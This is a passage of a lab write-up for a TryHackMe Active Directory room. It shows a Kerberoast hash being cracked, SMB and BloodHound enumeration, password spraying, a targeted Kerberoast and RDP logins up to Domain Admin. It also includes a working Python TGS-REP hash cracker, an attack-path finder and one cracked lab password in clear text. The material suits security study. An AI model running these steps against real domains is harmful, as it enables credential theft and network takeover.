$krb5tgs$23$*CODY_ROY$THM.LOCAL$thm.local\CODY_ROY*$faccfb441ea5a0322f3c625e5256b5ba$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:[cracked_password1]
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*CODY_ROY$THM.LOCAL$thm.local\CODY_ROY*...b2e0e9
Time.Started.....: Sat Apr 18 23:25:37 2026 (1 sec)
Time.Estimated...: Sat Apr 18 23:25:38 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 2797.2 kH/s (2.99ms) @ Accel:1024 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 712704/14344385 (4.97%)
Rejected.........: 0/712704 (0.00%)
Restore.Point....: 700416/14344385 (4.88%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: albe69 -> Ananas
Hardware.Mon.#01.: Temp: 43c Util: 20%
Started: Sat Apr 18 23:25:36 2026
Stopped: Sat Apr 18 23:25:39 2026
Let's enumerate the SMB shares using the cracked credentials.
┌──(rikuxx㉿kali)-[~/tryhackme/Operation_Endgame]
└─$ nxc smb AD.thm.local -u CODY_ROY -p '[cracked_password1]' --shares
SMB [target_ip] 445 AD [*] Windows 10 / Server 2019 Build 17763 x64 (name:AD) (domain:thm.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB [target_ip] 445 AD [+] thm.local\CODY_ROY:MKO)mko0
SMB [target_ip] 445 AD [*] Enumerated shares
SMB [target_ip] 445 AD Share Permissions Remark
SMB [target_ip] 445 AD ----- ----------- ------
SMB [target_ip] 445 AD ADMIN$ Remote Admin
SMB [target_ip] 445 AD C$ Default share
SMB [target_ip] 445 AD IPC$ READ Remote IPC
SMB [target_ip] 445 AD NETLOGON READ Logon server share
SMB [target_ip] 445 AD SYSVOL READ Logon server share
We can see that these credentials are valid.
I also tried whether WinRM access was possible, but the connection was refused.
┌──(rikuxx㉿kali)-[~/tryhackme/Operation_Endgame]
└─$ evil-winrm -i [target_ip] -u CODY_ROY -p '[cracked_password1]'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: Connection timeout or error occurred: Errno::ECONNREFUSED - Connection refused - Connection refused - connect(2) for "[target_ip]" port 5985 (10.48.183.252:5985)
Warning: Cleaning up and exiting...
This calls for a bit of a rethink. Since there were so many user accounts to begin with, BloodHound might give a clearer picture.
So I ran the following to collect data.
┌──(rikuxx㉿kali)-[~/tryhackme/Operation_Endgame]
└─$ bloodhound-python -u CODY_ROY -p '[cracked_password1]' -d thm.local -ns [target_ip] -c All
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: thm.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: ad.thm.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: ad.thm.local
INFO: Found 490 users
INFO: Found 53 groups
INFO: Found 4 gpos
INFO: Found 216 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: ad.thm.local
INFO: Done in 01M 24S
The collection succeeded.
Analyzing the environment in BloodHound, CODY_ROY has a few interesting rights. As a group member, he belongs to EVERYONE. This user also has GenericWrite over various users, which would allow shadow credential or targeted Kerberoast attacks against each of them. At first glance, however, none of those users has interesting rights or group memberships.
CODY_ROY is also not a member of any special groups.
The following users can be identified as domain admins.
Looking further, at the shortest path to Domain Admins, we can see that the user "guest" has been granted special rights, which makes privilege escalation to domain admin possible.
Source: https://0xb0b.gitbook.io/writeups/tryhackme/2026/operation-endgame#bloodhound-enumeration
(Taking screenshots on Kali Linux is a hassle, so please forgive me for this.)
Lateral Movement
In short, we need to compromise accounts in the following order.
GUEST@THM.LOCAL → MARGARITO_HAMILTON@THM.LOCAL → DOMAIN ADMIN@THM.LOCAL
But there is no obvious lead.
So let's use kerbrute to check whether the password we already have is reused by other users.
┌──(rikuxx㉿kali)-[~/tryhackme/Operation_Endgame]
└─$ ./kerbrute passwordspray -d 'thm.local' --dc [target_ip] usernames.txt '[cracked_password1]'
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (9cfb81e) - 04/19/26 - Ronnie Flathers @ropnop
2026/04/19 00:08:04 > Using KDC(s):
2026/04/19 00:08:04 > [target_ip]
2026/04/19 00:08:06 > [+] VALID LOGIN: CODY_ROY@thm.local:[cracked_password1]
2026/04/19 00:08:17 > [+] VALID LOGIN: ZACHARY_HUNT@thm.local:[cracked_password1]
2026/04/19 00:08:24 > Done! Tested 492 logins (2 successes) in 19.580 seconds
So [cracked_password1] is also in use on the ZACHARY_HUNT account.
Checking BloodHound, ZACHARY_HUNT has GenericWrite over JERRI_LANCASTER.
Source: https://0xb0b.gitbook.io/writeups/tryhackme/2026/operation-endgame#access-as-zachary_hunt
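The "shortest path to Domain Admins" that BloodHound draws, and the way one sprayed password opened a path that did not exist from CODY_ROY alone, comes down to a breadth-first search over abusable edges from every owned principal. The block below is an added example, not part of the original writeup or of BloodHound's code. It walks a constructed toy graph that reuses the page's principal names: only the ZACHARY_HUNT -> JERRI_LANCASTER GenericWrite edge and SANFORD_DAUGHERTY's Domain Admins membership come from the page; CONSTRUCTED_USER, CONSTRUCTED_GROUP and the edges touching them are made up so that a complete chain exists to walk. It also drops rights such as GetChanges that do not give takeover on their own.

```python
from collections import deque

# Rights that let the holder take over the target (BloodHound's abusable edges);
# MemberOf is included because it is how a user inherits a group's rights.
ABUSABLE = {"MemberOf", "GenericAll", "GenericWrite", "WriteOwner", "WriteDacl",
            "Owns", "ForceChangePassword", "AddMember", "AddSelf", "AllExtendedRights"}

# Constructed toy graph of (source, right, target) edges. Only the first two edges
# are stated in the writeup (ZACHARY_HUNT GenericWrite JERRI_LANCASTER and
# SANFORD_DAUGHERTY in Domain Admins); CONSTRUCTED_USER, CONSTRUCTED_GROUP and the
# edges touching them are made up so there is a complete path to walk.
EDGES = [
    ("ZACHARY_HUNT@THM.LOCAL", "GenericWrite", "JERRI_LANCASTER@THM.LOCAL"),
    ("SANFORD_DAUGHERTY@THM.LOCAL", "MemberOf", "DOMAIN ADMINS@THM.LOCAL"),
    ("CODY_ROY@THM.LOCAL", "MemberOf", "EVERYONE@THM.LOCAL"),
    ("CODY_ROY@THM.LOCAL", "GenericWrite", "CONSTRUCTED_USER@THM.LOCAL"),
    ("CODY_ROY@THM.LOCAL", "GetChanges", "THM.LOCAL"),   # not a takeover right by itself
    ("JERRI_LANCASTER@THM.LOCAL", "WriteOwner", "CONSTRUCTED_GROUP@THM.LOCAL"),
    ("CONSTRUCTED_GROUP@THM.LOCAL", "GenericAll", "SANFORD_DAUGHERTY@THM.LOCAL"),
]

DOMAIN_ADMINS = "DOMAIN ADMINS@THM.LOCAL"


def build_graph(edges, abusable=ABUSABLE):
    """Adjacency list keeping only edges an attacker can actually abuse."""
    graph = {}
    for src, right, dst in edges:
        if right in abusable:
            graph.setdefault(src, []).append((right, dst))
    return graph


def shortest_path(owned, target, edges, abusable=ABUSABLE):
    """Multi-source BFS from every owned principal; returns
    [node, right, node, ..., target] or None if no abusable chain exists."""
    graph = build_graph(edges, abusable)
    queue = deque((node, [node]) for node in sorted(owned))
    seen = set(owned)
    while queue:
        node, path = queue.popleft()
        if node == target:
            return path
        for right, nxt in graph.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, path + [right, nxt]))
    return None


def path_unlocked_by(owned, newly_owned, target, edges):
    """What the password spray bought: (path before owning the new principal, path after)."""
    return (shortest_path(owned, target, edges),
            shortest_path(set(owned) | set(newly_owned), target, edges))


if __name__ == "__main__":
    before, after = path_unlocked_by({"CODY_ROY@THM.LOCAL"}, {"ZACHARY_HUNT@THM.LOCAL"},
                                     DOMAIN_ADMINS, EDGES)
    print("from CODY_ROY only:", before)
    print("after owning ZACHARY_HUNT:", " -> ".join(after))
```

Running the file prints None for the CODY_ROY-only case and the full chain once ZACHARY_HUNT is added to the owned set. In a real engagement the edge list comes from the collector's JSON rather than a hand-written list; the point is that re-running the search every time a new credential lands is what turns an apparent dead end into a path.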
So let's check whether JERRI_LANCASTER can be Kerberoasted. With GenericWrite on the account, targetedKerberoast.py sets a temporary SPN on it, requests a service ticket for that SPN, prints the TGS-REP hash and then removes the SPN again (worth verifying afterwards, since a leftover SPN is a noisy artifact).
Run the following:
┌──(rikuxx㉿kali)-[~/tryhackme/Operation_Endgame]
└─$ ./targetedKerberoast.py -d 'thm.local' -u 'zachary_hunt' -p '[cracked_password1]' --request-user 'jerri_lancaster' --dc-ip [target_ip]
[*] Starting kerberoast attacks
[*] Attacking user (jerri_lancaster)
[+] Printing hash for (JERRI_LANCASTER)
$krb5tgs$23$*JERRI_LANCASTER$THM.LOCAL$thm.local/JERRI_LANCASTER*$671955d067703b7098d1aac6047f6f4c$[...]
And it dumped a TGS-REP hash for JERRI_LANCASTER.
Let's crack the password:
┌──(rikuxx㉿kali)-[~/tryhackme/Operation_Endgame]
└─$ echo '$krb5tgs$23$*JERRI_LANCASTER$THM.LOCAL$thm.local/JERRI_LANCASTER*$671955d067703b7098d1aac6047f6f4c$[...]' > jerri.hash
┌──(rikuxx㉿kali)-[~/tryhackme/Operation_Endgame]
└─$ hashcat -m 13100 jerri.hash /usr/share/wordlists/rockyou.txt
hashcat (v7.1.2) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #01: cpu-skylake-avx512-AMD Ryzen 5 PRO 8640HS w/ Radeon 760M Graphics, 4779/9558 MB (2048 MB allocatable), 12MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimum salt length supported by kernel: 0
Maximum salt length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory allocated for this attack: 515 MB (6023 MB free)
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5tgs$23$*JERRI_LANCASTER$THM.LOCAL$thm.local/JERRI_LANCASTER*$671955d067703b7098d1aac6047f6f4c$[...]:[cracked_password2]
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*JERRI_LANCASTER$THM.LOCAL$thm.local/JE...683080
Time.Started.....: Sun Apr 19 00:29:57 2026 (0 secs)
Time.Estimated...: Sun Apr 19 00:29:57 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 6043.4 kH/s (1.36ms) @ Accel:1024 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 626688/14344385 (4.37%)
Rejected.........: 0/626688 (0.00%)
Restore.Point....: 614400/14344385 (4.28%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: mizzmoss -> lokita6
Hardware.Mon.#01.: Temp: 56c Util: 24%
Started: Sun Apr 19 00:29:57 2026
Stopped: Sun Apr 19 00:29:59 2026
The password cracked in about two seconds.
Since JERRI_LANCASTER holds WriteOwner rights, this is a big win.
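Why a TGS-REP hash falls this quickly: the ticket's encrypted part is RC4-HMAC (etype 23), keyed directly by the account's NT hash, so each guess costs one MD4 plus a couple of HMAC-MD5s and an RC4 pass, with no salt and no iterations. The block below is an added example, not part of the original writeup or of hashcat's or targetedKerberoast's code. It rebuilds a `$krb5tgs$23$` line from a constructed password and plaintext (the account name, realm and SPN are the page's; the password `Winter2026!`, the wordlist, the confounder and the plaintext bytes are made up) and then cracks it the same way hashcat -m 13100 does.

```python
import hashlib
import hmac
import re
import struct


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often unavailable under OpenSSL 3."""
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000, (3, 7, 11, 19), tuple(range(16))),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for f, k, s, order in rounds:
            for i, j in enumerate(order):
                a, b, c, d = d, rotl((a + f(b, c, d) + x[j] + k) & 0xFFFFFFFF, s[i % 4]), b, c
        h = [(u + v) & 0xFFFFFFFF for u, v in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """The RC4-HMAC Kerberos key is just MD4(UTF-16LE(password)): no salt, no stretching."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):                       # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:                          # keystream generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


TICKET_KEY_USAGE = 2   # RFC 4120 key usage number for a ticket's enc-part


def rc4_hmac_encrypt(key: bytes, plaintext: bytes, confounder: bytes):
    """RFC 4757 encryption as the KDC performs it; returns (checksum, ciphertext)."""
    k1 = _hmac_md5(key, struct.pack("<I", TICKET_KEY_USAGE))
    data = confounder + plaintext
    checksum = _hmac_md5(k1, data)
    return checksum, rc4(_hmac_md5(k1, checksum), data)


def rc4_hmac_verify(key: bytes, checksum: bytes, ciphertext: bytes) -> bool:
    """One password guess: derive K3 from the checksum, decrypt, recompute the HMAC."""
    k1 = _hmac_md5(key, struct.pack("<I", TICKET_KEY_USAGE))
    data = rc4(_hmac_md5(k1, checksum), ciphertext)
    return hmac.compare_digest(_hmac_md5(k1, data), checksum)


HASH_RE = re.compile(r"^\$krb5tgs\$23\$\*([^$]+)\$([^$]+)\$([^*]+)\*\$([0-9a-fA-F]{32})\$([0-9a-fA-F]+)$")


def parse_krb5tgs23(line: str) -> dict:
    """Split a hashcat -m 13100 line into user, realm, SPN, checksum and encrypted data."""
    m = HASH_RE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5tgs$23$ hash line")
    user, realm, spn, checksum, edata = m.groups()
    return {"user": user, "realm": realm, "spn": spn,
            "checksum": bytes.fromhex(checksum), "edata": bytes.fromhex(edata)}


def build_krb5tgs23(user, realm, spn, password, plaintext, confounder) -> str:
    checksum, ciphertext = rc4_hmac_encrypt(nt_hash(password), plaintext, confounder)
    return f"$krb5tgs$23$*{user}${realm}${spn}*${checksum.hex()}${ciphertext.hex()}"


def crack(line: str, wordlist):
    """Return the first wordlist entry whose NT hash verifies the ticket, else None."""
    h = parse_krb5tgs23(line)
    return next((c for c in wordlist if rc4_hmac_verify(nt_hash(c), h["checksum"], h["edata"])), None)


# Constructed sample: account name, realm and SPN are the page's; everything else is made up.
SAMPLE_PASSWORD = "Winter2026!"
SAMPLE_LINE = build_krb5tgs23(
    "JERRI_LANCASTER", "THM.LOCAL", "thm.local/JERRI_LANCASTER", SAMPLE_PASSWORD,
    b"\x63\x82\x01\x00" + b"stand-in for the real EncTicketPart ASN.1 body",
    b"\x00\x11\x22\x33\x44\x55\x66\x77",   # fixed confounder for reproducibility; a KDC uses random bytes
)
WORDLIST = ["password", "Summer2025", "Welcome1", SAMPLE_PASSWORD, "P@ssw0rd"]

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("cracked:", crack(SAMPLE_LINE, WORDLIST))
```

The verify step is the whole cost of a guess, which is why a CPU manages millions of candidates per second here. The defensive takeaway is the mirror image: accounts that carry SPNs should not be allowed RC4 (restrict msDS-SupportedEncryptionTypes to AES) and should have long random passwords or be gMSAs, so that neither the cheap key derivation nor the wordlist applies.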
At this point RDP looks possible, so try connecting with:
┌──(rikuxx㉿kali)-[~/tryhackme/Operation_Endgame]
└─$ xfreerdp /v:[target_ip] /u:JERRI_LANCASTER /p:'[cracked_password2]' /d:thm.local /network:modem /compression -themes -wallpaper
The RDP connection succeeded.
However, nothing on the desktop responds to clicks, so press Win+R and launch a CMD shell from the Run dialog.
(This is not a UAC bypass: the Run dialog simply starts cmd.exe in the same user context when the desktop shell is unresponsive.)
Source: https://0xb0b.gitbook.io/writeups/tryhackme/2026/operation-endgame#access-as-jerri_lancaster
Here, credentials for another account were found in this session.
Source: https://0xb0b.gitbook.io/writeups/tryhackme/2026/operation-endgame#access-as-jerri_lancaster
Privilege Escalation
Checking BloodHound, SANFORD_DAUGHERTY is a Domain Admin.
Source: https://0xb0b.gitbook.io/writeups/tryhackme/2026/operation-endgame#shell-as-sanford_daugherty
Trying RDP with the credentials just obtained succeeded:
xfreerdp /v:[target_ip] /u:SANFORD_DAUGHERTY /p:'[password obtained above]' /d:thm.local
As before, press Win+R and launch a CMD shell.

Source: https://0xb0b.gitbook.io/writeups/tryhackme/2026/operation-endgame#shell-as-sanford_daugherty
whoami /priv shows only a handful of privileges, with SeChangeNotifyPrivilege enabled. That privilege is held by every user by default, so by itself it says nothing about admin rights; what the short list tells us is that this session runs under the UAC-filtered (medium integrity) half of SANFORD_DAUGHERTY's split token, even though the account is a Domain Admin.
Source: https://0xb0b.gitbook.io/writeups/tryhackme/2026/operation-endgame#shell-as-sanford_daugherty
Pressing Ctrl + Shift + Enter in the Run dialog launches cmd.exe with "Run as administrator". Because the account already is an administrator, this is ordinary UAC elevation through the consent prompt rather than a UAC bypass, and it yields the full admin token.
Source: https://0xb0b.gitbook.io/writeups/tryhackme/2026/operation-endgame#shell-as-sanford_daugherty
With that we have an administrative shell.
Finally, moving to C:\Users\Administrator\Desktop, the flag was there.
Source: https://0xb0b.gitbook.io/writeups/tryhackme/2026/operation-endgame#shell-as-sanford_daugherty
Wrap-up
This time I worked through a Hard Active Directory lab, and it was tough. Since it had been a while since my last one, it put up a real fight.
I also consulted Gemini and the like along the way, but it still seems to me that AI-driven pentesting has clear limits.
I hope this helps someone learn.